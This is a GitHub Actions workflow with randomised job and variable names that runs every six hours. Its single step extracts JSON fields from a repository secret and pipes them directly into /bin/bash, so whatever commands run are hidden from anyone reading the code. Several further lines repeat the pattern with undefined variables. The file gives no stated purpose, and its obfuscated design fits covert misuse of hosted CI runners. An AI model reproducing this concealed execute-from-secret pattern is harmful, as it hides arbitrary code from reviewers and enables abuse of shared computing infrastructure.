name: songbingjia7986
on:
  workflow_dispatch:
  schedule:
    - cron: '38 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: songbingjia7986
        env:
          ame633: ${{ secrets.ame633 }}
        run: |
          echo $ame633 | jq -r .eovo950 | /bin/bash
          echo $pwhb34 | jq -r .wvkn5609 | /bin/bash
          echo $k74712 | jq -r .ncxyi24138 | /bin/bash
          echo $sdes38 | jq -r .v4703 | /bin/bash
          echo $nwtyu26 | jq -r .esfap8 | /bin/bash
          echo $llr413 | jq -r .korf4 | /bin/bash
          echo $ojzb758 | jq -r .y73697 | /bin/bash

